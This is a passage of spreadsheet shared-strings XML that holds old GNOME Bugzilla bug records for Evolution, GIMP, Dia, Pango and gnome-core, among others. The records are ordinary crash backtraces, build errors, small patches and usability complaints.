    <t>eric.zhao</t>
  </si>
  <si>
    <t>jessie30</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-502789</t>
  </si>
  <si>
    <t>e-password dialog hides behind the main window</t>
  </si>
  <si>
    <t>e-password dialog is sometimes hidden behind the main Evolution window.  Since it doesn't have a separate entry in the window list if you don't think of iconifying the main window then you don't realize you are being asked for a password.</t>
  </si>
  <si>
    <t>jedy.wang</t>
  </si>
  <si>
    <t>GIMP-317340</t>
  </si>
  <si>
    <t>'convolve'ing near layer bounds == crash.</t>
  </si>
  <si>
    <t>steps to reproduce:
* new image
* select a largish (easily visible) brush
* choose convolve tool set to blur.
* try to paint across the edge of the image -&gt; crash.
The most intuitive behaviour would be to treat all pixels past the image border
as being the same color as the last pixel inside the image border (like what
several plugins call 'smear' mode)</t>
  </si>
  <si>
    <t>neota</t>
  </si>
  <si>
    <t>GVFS-506504</t>
  </si>
  <si>
    <t>build fails: Can't open ../mkinstalldirs</t>
  </si>
  <si>
    <t>make[1]: Verlasse Verzeichnis '/media/bigspace/svn/gnome/gvfs/daemon'
Making install in po
make[1]: Betrete Verzeichnis '/media/bigspace/svn/gnome/gvfs/po'
if test -r .././mkinstalldirs then \
          .././mkinstalldirs /opt/gnome2/share \
        else \
          /bin/sh ../mkinstalldirs /opt/gnome2/share \
        fi
/bin/sh: Can't open ../mkinstalldirs
make[1]: *** [install-data-yes] Fehler 2</t>
  </si>
  <si>
    <t>METACITY-81857</t>
  </si>
  <si>
    <t>it is not possible to set several keybindings [not instant apply?]</t>
  </si>
  <si>
    <t>tested on solaris sparc 9 nightly build 14ht May.
Launch gconf-editor select /apps/metacity/general/window_keybindings.
All with the exception of one key binding are disabled. It is not possible
to configure any of these key bindings so that they actually work. It
would appear using gconftool-2 and the keyboard shortcuts capplet that the
binding is being saved executing the key sequence set does not work.
For example set F6 to close a window after setting this selecting a
window and pressing Alt-F6 yields nothing.</t>
  </si>
  <si>
    <t>robert.kinsella</t>
  </si>
  <si>
    <t>GNUMERIC-58255</t>
  </si>
  <si>
    <t>Backspace key doesn't work</t>
  </si>
  <si>
    <t>Backspace key does not function within cells only when the cursor is moved
up to the toolbar's Data Entry area.
System is a vanilla Red Hat 7.1 with up-to-date package management by
Ximian Red Carpet.</t>
  </si>
  <si>
    <t>digitect</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-140836</t>
  </si>
  <si>
    <t>text field (for numerals) hard to delineate in a11y themes</t>
  </si>
  <si>
    <t>Running GNOME built using gcalctool-4.3.50-9 source tarball:
-Change the theme to High Contrast Large Print Inverse
-Open the gnome calculator
Observe that the the area limits of the text field
(for the numerals) cannot really be seen and this makes
direct entry of numerals into the field difficult for
vision-impaired users.</t>
  </si>
  <si>
    <t>gcalctool-maint</t>
  </si>
  <si>
    <t>GNOME-APPLETS-52279</t>
  </si>
  <si>
    <t>gcc-specific code</t>
  </si>
  <si>
    <t>tickastat uses some gcc-specific extension.  I had to make a
couple small changes so it would compile on IRIX 6.2.  Here's
a patch:
--- ./tickastat/mod_news.c	Sun May 21 20:22:55 2000
+++ ../gnome-applets-1.2.4/./tickastat/mod_news.c	Thu Mar 15 18:39:08 2001
@@ -12008 +120017 @@
 	GtkWidget *label
 	GtkWidget *button
 	GtkWidget *scrolled
-	gchar *titles[] = { _(Enabled) _(Name) _(Line delay) _(Update
interval)
-			    _(D) _(T) _(I) _(B) NULL }
+	gchar *titles[9]
+
+	titles[0] = _(Enabled)
+	titles[1] = _(Name)
+	titles[2] = _(Line delay)
+	titles[3] = _(Update interval)
+	titles[4] = _(D)
+	titles[5] = _(T)
+	titles[6] = _(I)
+	titles[7] = _(B)
+	titles[8] = NULL
 	nd-&gt;C_row = -1</t>
  </si>
  <si>
    <t>DIA-414708</t>
  </si>
  <si>
    <t>crash in Dia Diagram Editor: drawing a circle from th...</t>
  </si>
  <si>
    <t>Version: @VERSION@
What were you doing when the application crashed?
drawing a circle from the flowchart. Holding shift in.
Distribution: Mandriva Linux release 2007.0 (Official) for i586
Gnome Release: 2.16.0 2006-09-04 (Mandriva)
BugBuddy Version: 2.16.0
Memory status: size: 68042752 vsize: 0 resident: 68042752 share: 0 rss: 39190528 rss_rlim: 0
CPU usage: start_time: 1173046733 rtime: 0 utime: 620 stime: 0 cutime:524 cstime: 0 timeout: 96 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/dia'
(no debugging symbols found)
Using host libthread_db library /lib/i686/libthread_db.so.1.
(no debugging symbols found)
`shared object read from target memory' has disappeared keeping its symbols.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1227041088 (LWP 28146)]
(no debugging symbols found)
0xbfffe410 in __kernel_vsyscall ()
#0  0xbfffe410 in __kernel_vsyscall ()
#1  0xb715e2a3 in __waitpid_nocancel () from /lib/i686/libpthread.so.0
#2  0xb7e1c4e7 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x08071edb in ddisplay_add_update_pixels ()
#5  0x0805d506 in diagram_add_update_pixels ()
#6  0x0806e689 in connectionpoint_add_update ()
#7  0x08067133 in object_add_updates ()
#8  0x0809d660 in textedit_activate_object ()
#9  0x0807bd5f in create_create_object_tool ()
#10 0x0806fe02 in ddisplay_canvas_events ()
#11 0xb7a2e18c in gtk_marshal_BOOLEAN__VOID ()
   from /usr/lib/libgtk-x11-2.0.so.0
#12 0xb71772bb in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#13 0xb71888ee in g_signal_override_class_closure ()
   from /usr/lib/libgobject-2.0.so.0
#14 0xb7189bc4 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#15 0xb7189f9b in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#16 0xb7b454db in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
#17 0xb7a27318 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#18 0xb7a28578 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#19 0xb78ad748 in gdk_add_client_message_filter ()
   from /usr/lib/libgdk-x11-2.0.so.0
#20 0xb70e11b5 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#21 0xb70e41d2 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#22 0xb70e4544 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#23 0xb7a2899f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#24 0x0809eb3a in main ()
Thread 1 (Thread -1227041088 (LWP 28146)):
#0  0xbfffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb715e2a3 in __waitpid_nocancel () from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0xb7e1c4e7 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x08071edb in ddisplay_add_update_pixels ()
No symbol table info available.
#5  0x0805d506 in diagram_add_update_pixels ()
No symbol table info available.
#6  0x0806e689 in connectionpoint_add_update ()
No symbol table info available.
#7  0x08067133 in object_add_updates ()
No symbol table info available.
#8  0x0809d660 in textedit_activate_object ()
No symbol table info available.
#9  0x0807bd5f in create_create_object_tool ()
No symbol table info available.
#10 0x0806fe02 in ddisplay_canvas_events ()
No symbol table info available.
#11 0xb7a2e18c in gtk_marshal_BOOLEAN__VOID ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#12 0xb71772bb in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0xb71888ee in g_signal_override_class_closure ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0xb7189bc4 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0xb7189f9b in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0xb7b454db in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#17 0xb7a27318 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#18 0xb7a28578 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#19 0xb78ad748 in gdk_add_client_message_filter ()
   from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#20 0xb70e11b5 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#21 0xb70e41d2 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#22 0xb70e4544 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#23 0xb7a2899f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0x0809eb3a in main ()
No symbol table info available.</t>
  </si>
  <si>
    <t>jddcef</t>
  </si>
  <si>
    <t>GUCHARMAP-510813</t>
  </si>
  <si>
    <t>GUCHARMAP: Lots of warnings</t>
  </si>
  <si>
    <t>This is happening with gucharmap: 1:2.21.5-0ubuntu1
If you start with gucharmap activated no row is activated so it try to show a
empty list. I think that's the cause of this warnings:
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_char: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_last_index: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_char: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_char: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_last_index: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_char: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_char: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_last_index: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_char: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_char: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_last_index: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed
** (gedit:23867): CRITICAL **: gucharmap_codepoint_list_get_char: assertion `IS_GUCHARMAP_CODEPOINT_LIST (list)' failed</t>
  </si>
  <si>
    <t>gucharmap-maint</t>
  </si>
  <si>
    <t>EVOLUTION-249232</t>
  </si>
  <si>
    <t>Contact editor segv</t>
  </si>
  <si>
    <t>When adding a new contact and filling in Full Name Job title
Organization telephone number then trying to an address the contact
editor crashed.
Oddly changing the theme 'fixed' it.  The theme was 'deafult' and
changing it to 'simple' prevented the crash.  Oddly changing back to
'default' seems to be ok.
I did grab a backtrace before changing the themes though:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 1024 (LWP 2255)]
0x418578ee in _init () from /usr/lib/evolution/1.4/libename.so.0
(gdb) bt
#0  0x418578ee in _init () from /usr/lib/evolution/1.4/libename.so.0
#1  0x41857ea3 in e_address_western_parse ()
   from /usr/lib/evolution/1.4/libename.so.0
#2  0x415eee90 in e_card_delivery_address_from_label ()
   from /usr/lib/evolution/1.4/libebook.so.0
#3  0x415e8f9e in e_card_simple_set_address ()
   from /usr/lib/evolution/1.4/libebook.so.0
#4  0x419acbbe in e_contact_editor_get_type ()
   from /usr/lib/evolution/1.4/components/libevolution-addressbook.so
#5  0x40f73d36 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#6  0x40f5fe2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#7  0x40f72f33 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#8  0x40f717aa in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#9  0x40f71a55 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#10 0x40c2d8e0 in gtk_text_buffer_set_text () from /usr/lib/libgtk-x11-2.0.so.0
#11 0x40bd0146 in _gtk_marshal_VOID__BOXED_STRING_INT ()
   from /usr/lib/libgtk-x11-2.0.so.0
#12 0x40f60205 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
#13 0x40f5fe2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#14 0x40f7332a in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#15 0x40f717aa in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#16 0x40f71a55 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
---Type  to continue or q  to quit---
#17 0x40c2d9fe in gtk_text_buffer_set_text () from /usr/lib/libgtk-x11-2.0.so.0
#18 0x40c2dcb7 in gtk_text_buffer_insert_interactive ()
   from /usr/lib/libgtk-x11-2.0.so.0
#19 0x40c2dd5f in gtk_text_buffer_insert_interactive_at_cursor ()
   from /usr/lib/libgtk-x11-2.0.so.0
#20 0x40c4eef6 in gtk_text_view_get_default_attributes ()
   from /usr/lib/libgtk-x11-2.0.so.0
#21 0x40c4edb5 in gtk_text_view_get_default_attributes ()
   from /usr/lib/libgtk-x11-2.0.so.0
#22 0x40f744b2 in g_cclosure_marshal_VOID__STRING ()
   from /usr/lib/libgobject-2.0.so.0
#23 0x40f5fe2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#24 0x40f72f33 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#25 0x40f717aa in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#26 0x40f721e9 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#27 0x40bb76a8 in gtk_im_multicontext_new () from /usr/lib/libgtk-x11-2.0.so.0
#28 0x40f744b2 in g_cclosure_marshal_VOID__STRING ()
   from /usr/lib/libgobject-2.0.so.0
#29 0x40f5fe2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#30 0x40f72f33 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#31 0x40f717aa in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#32 0x40f721e9 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#33 0x40bb5b8a in gtk_im_context_simple_new ()
---Type  to continue or q  to quit---
   from /usr/lib/libgtk-x11-2.0.so.0
#34 0x40bb5efe in gtk_im_context_simple_new ()
   from /usr/lib/libgtk-x11-2.0.so.0
#35 0x40bb61f9 in gtk_im_context_simple_new ()
   from /usr/lib/libgtk-x11-2.0.so.0
#36 0x40bb5450 in gtk_im_context_filter_keypress ()
   from /usr/lib/libgtk-x11-2.0.so.0
#37 0x40bb7421 in gtk_im_multicontext_new () from /usr/lib/libgtk-x11-2.0.so.0
#38 0x40bb5450 in gtk_im_context_filter_keypress ()
   from /usr/lib/libgtk-x11-2.0.so.0
#39 0x40c4aef9 in gtk_text_view_place_cursor_onscreen ()
   from /usr/lib/libgtk-x11-2.0.so.0
#40 0x40bcf092 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#41 0x40f60205 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
#42 0x40f5fe2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#43 0x40f7332a in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#44 0x40f71817 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#45 0x40f71a55 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#46 0x40c8b482 in gtk_widget_send_expose () from /usr/lib/libgtk-x11-2.0.so.0
#47 0x40c8afb0 in gtk_widget_event () from /usr/lib/libgtk-x11-2.0.so.0
#48 0x40c96310 in _gtk_window_query_nonaccels ()
   from /usr/lib/libgtk-x11-2.0.so.0
---Type  to continue or q  to quit---
#49 0x4040bcb0 in bonobo_window_get_accel_group ()
   from /usr/lib/libbonoboui-2.so.0
#50 0x40bcf092 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#51 0x40f60205 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
#52 0x40f5fe2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#53 0x40f7332a in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#54 0x40f71817 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#55 0x40f71a55 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#56 0x40c8b482 in gtk_widget_send_expose () from /usr/lib/libgtk-x11-2.0.so.0
#57 0x40c8afb0 in gtk_widget_event () from /usr/lib/libgtk-x11-2.0.so.0
#58 0x40bcef0d in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#59 0x40bcdf4e in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#60 0x40d65401 in _gdk_events_queue () from /usr/lib/libgdk-x11-2.0.so.0
#61 0x40fb401b in unblock_source () from /usr/lib/libglib-2.0.so.0
#62 0x40fb4e47 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#63 0x40fb5223 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#64 0x40fb58ff in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#65 0x40475a3f in bonobo_main () from /usr/lib/libbonobo-2.so.0
#66 0x080aa0be in main ()
#67 0x4101214f in __libc_start_main () from /lib/libc.so.6
It is now unreproducible but thought it might be of interest.</t>
  </si>
  <si>
    <t>ORCA-443012</t>
  </si>
  <si>
    <t>atspi.py:_onParentChanged upsets atspi.py:_cache in a bad way</t>
  </si>
  <si>
    <t>atspi.py:_onParentChanged currently just deletes an Accessible from the cache.  The impact of this is that anyone hanging on to an object whose parent has changed can end up resulting in two copies of the same Accessible for a single CORBA object.</t>
  </si>
  <si>
    <t>PANGO-88363</t>
  </si>
  <si>
    <t>pango xft check not picking up header</t>
  </si>
  <si>
    <t>pango wasn't finding that i have xft installed this patch fixes it (on
stable):
--- configure.in        13 Jun 2002 21:10:29 -0000      1.109.2.3
+++ configure.in        16 Jul 2002 16:45:26 -0000
@@ -2037 +2037 @@
 if test $have_x = true  then
   if test $have_freetype = true  then
     pango_save_cppflags=$CPPFLAGS
-    CPPFLAGS=$CPPFLAGS $FREETYPE_CFLAGS
+    CPPFLAGS=$CPPFLAGS $FREETYPE_CFLAGS $X_CFLAGS
     AC_CHECK_LIB(Xrender XRenderFindFormat 
       [AC_CHECK_LIB(Xft XftFontOpen</t>
  </si>
  <si>
    <t>GNOME-PRINT-160434</t>
  </si>
  <si>
    <t>PDF backend</t>
  </si>
  <si>
    <t>pdf created with image is invalid according to acoread</t>
  </si>
  <si>
    <t>Using the new gnome-print based export plug-in of Dia produces
invalid PDF from my standard test file 
(dia/samples/render-test.dia)
Adobe Reader 6.0 (running on windoze) shows
UnzulÃ¤ssiger Vorgang im Pfad (invalid operation in path).
gpdf displays it correctly.
Just in case you are wondering: the file is broken no matter
what platform (Linux/win32) gnome-print is running on.</t>
  </si>
  <si>
    <t>MARLIN-154158</t>
  </si>
  <si>
    <t>MARLIN</t>
  </si>
  <si>
    <t>Typos in marlin</t>
  </si>
  <si>
    <t>#: marlin/marlin-channel.c:137
msgid 
Error opening peak file '%'\n
Error: '%'
#: marlin/marlin-channel.c:689
msgid 
Error writing data to '%'\n
Error: %s
#: src/dialogs/marlin-burn-dialog.c:531
msgid 
The sample is being writen to the disc. This operation may take a long time 
depending on the length of the sample and write speed</t>
  </si>
  <si>
    <t>phhigino</t>
  </si>
  <si>
    <t>EVOLUTION-211639</t>
  </si>
  <si>
    <t>Cursor Location and where the text actually goes...</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Minor
Version: 0.14
Synopsis: Cursor Location and where the text actually goes...
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
This might be a bit picky but its starting to get on my nerves.
I compose a new email but enter the text body first then fill in the
destination email and subject. 
Click in the subject line but move my mouse over the subject body and
start typing. The cursor remains blinking in the subject like and also
in the message body and the text actually gets entered into the subject
body.
This behaviour is the same with other header fields like to and cc. It
takes a bit of playing around to work out all the combinations but I
would expect text to be placed where ever the cursor is blinking.
regardless of where I have bumped the mouse to.
This is the number one complaint my wife makes with evolution.
Other than that I'd like to congratulate all you guys on a fantastic job
with 0.14 its really now much better than it was and certainly more
stable.
great work!!
Gordon Staines
</t>
  </si>
  <si>
    <t>gordon</t>
  </si>
  <si>
    <t>GNOME-CORE-26090</t>
  </si>
  <si>
    <t>gmenu</t>
  </si>
  <si>
    <t>gnome menu editor crashes when selecting an item</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-core
Severity: grave
Version:  1.2.2
Synopsis: gnome menu editor crashes when selecting an item
Class:    sw-bug
Distribution: Debian woody
System: Linux 2.4.0-test9 i686 unknown
C library: C library 2.1.3-10
C compiler: 2.95.2
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.10
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.2
Description:
I opened up the gnome menu editor selected the favorites menu right
clicked and choose to add an item. The menu editor immediately
crashed. Then I reloaded it and now when I select any sub-tem of
Favorites it crashes
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
0x404b3e19 in wait4 () from /lib/libc.so.6
#0  0x404b3e19 in wait4 () from /lib/libc.so.6
#1  0x4050f078 in __check_rhosts_file () from /lib/libc.so.6
#2  0x400883d8 in gnome_init () from /usr/lib/libgnomeui.so.32
#3  0x40455868 in sigaction () from /lib/libc.so.6
#4  0x804cec9 in edit_area_set_to ()
#5  0x804f0c3 in menu_tree_populate ()
#6  0x401d6d6f in gtk_marshal_NONE__POINTER_INT ()
   from /usr/lib/libgtk-1.2.so.0
#7  0x4020568c in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#8  0x40204af5 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#9  0x40202bd3 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#10 0x4019bafc in gtk_ctree_get_type () from /usr/lib/libgtk-1.2.so.0
#11 0x401d6d19 in gtk_marshal_NONE__INT_INT_POINTER ()
   from /usr/lib/libgtk-1.2.so.0
#12 0x4020498f in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#13 0x40202bd3 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x401869b8 in gtk_clist_undo_selection () from /usr/lib/libgtk-1.2.so.0
#15 0x401972cd in gtk_ctree_get_type () from /usr/lib/libgtk-1.2.so.0
#16 0x401d69cb in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#17 0x40204b33 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#18 0x40202bd3 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#19 0x40238feb in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#20 0x401d6935 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#21 0x401d5b5e in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#22 0x40283027 in gdk_wm_protocols_filter () from /usr/lib/libgdk-1.2.so.0
#23 0x404212b9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#24 0x404218c3 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#25 0x40421a5c in g_main_run () from /usr/lib/libglib-1.2.so.0
#26 0x401d5457 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#27 0x804d885 in main ()
#28 0x4044fa42 in __libc_start_main () from /lib/libc.so.6
#0  0x404b3e19 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x4050f078 in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x400883d8 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x40455868 in sigaction () from /lib/libc.so.6
No symbol table info available.
#4  0x804cec9 in edit_area_set_to ()
No symbol table info available.
#5  0x804f0c3 in menu_tree_populate ()
No symbol table info available.
#6  0x401d6d6f in gtk_marshal_NONE__POINTER_INT ()
   from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x4020568c in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:05 -------
This bug was previously known as bug 26090 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=26090
Originally filed under the gnome-core product and general component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (tritchey@vacuumgenesis.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>tritchey</t>
  </si>
  <si>
    <t>GNOME-CORE-6469</t>
  </si>
  <si>
    <t>tasklist</t>
  </si>
  <si>
    <t>Problem in gnome-core 1.1.4 - Tasklist</t>
  </si>
  <si>
    <t xml:space="preserve">Package : gnome-core (tasklist)
Version : 1.1.4
Using RH6.1 and Windowmaker 0.61.1 as the window manager.
TaskList configuration : Show normal applications on all desktops is 
enabled.
There is no response if a task which is on a different worksapce than 
the current one is clicked. Stable version used to jump to the 
workspace that the task was displayed on.
Keep up the good work people.
bubye now
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 14:59 -------
This bug was previously known as bug 6469 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=6469
Originally filed under the gnome-core product and general component.
The original reporter (tlailax@netvision.net.il) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>tlailax</t>
  </si>
  <si>
    <t>NAUTILUS-CD-BURNER-144188</t>
  </si>
  <si>
    <t>burn vfs-method</t>
  </si>
  <si>
    <t>NAUTILUS-CD-BURNER</t>
  </si>
  <si>
    <t>hal requirement</t>
  </si>
  <si>
    <t>Required verison of hal is 0.15.0 which is greater than 0.2.9x (15 &gt; 2). It
breaks configure script when builded with current hal versions.</t>
  </si>
  <si>
    <t>nautilus-cd-burner-maint</t>
  </si>
  <si>
    <t>EVOLUTION-225241</t>
  </si>
  <si>
    <t>Only first part of message displayed</t>
  </si>
  <si>
    <t>Description of Problem:
This bug appears at least if you get a MMS
(multimediamessage) from a GSM Phone to your email
adress. Evolution only displays the first
attachment und simply doesn't show the others.
I think this is a major problem cause there is no
indication that you miss most of the message.
When I look at the source I see that the other
parts are present.
Steps to reproduce the problem:
I can send you such an email if you need it.
How often does this happen? 
always</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-500259</t>
  </si>
  <si>
    <t>Trailing \012 in network interface properties window title begone!</t>
  </si>
  <si>
    <t>GNOME-CORE-67308</t>
  </si>
  <si>
    <t xml:space="preserve">Package: panel
Severity: normal
Version: 1.0.55
&gt;Synopsis: 
&gt;Class: sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.6
GTK+: 1.2.6
ORBit: ORBit 0.5.0
gnome-libs: gnome-libs 1.0.55
gnome-core: gnome-core-1.0.55-12
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x2af908e9 in __wait4 () from /lib/libc.so.6
#0  0x2af908e9 in __wait4 () from /lib/libc.so.6
#1  0x2afef1ec in ?? () from /lib/libc.so.6
#2  0x2abff591 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x2af1dc68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x8057e5d in init_user_panels ()
#5  0x8052c23 in main ()
#6  0x2af179cb in __libc_start_main (main=0x80529d0  argc=3 
    argv=0x7ffff914 init=0x8050c28  fini=0x8079d8c  
    rtld_fini=0x2aab5e60  stack_end=0x7ffff90c)
    at ../sysdeps/generic/libc-start.c:92
#0  0x2af908e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x2afef1ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x2abff591 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x2af1dc68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x8057e5d in init_user_panels ()
No symbol table info available.
#5  0x8052c23 in main ()
No symbol table info available.
#6  0x2af179cb in __libc_start_main (main=0x80529d0  argc=3 
    argv=0x7ffff914 init=0x8050c28  fini=0x8079d8c  
    rtld_fini=0x2aab5e60  stack_end=0x7ffff90c)
    at ../sysdeps/generic/libc-start.c:92
argv = (char **) 0x7ffff914
rtld_fini = (void (*)()) 0x2aab5e60 
stack_end = (void *) 0x0
#0  0x0 in ?? ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-12-20 05:46 -------
Unknown version 1.0.x in product gnome-core. Setting version to the default unspecified.
The original reporter (Walid.Tfaili@loria.fr) of this bug does not have an account here.
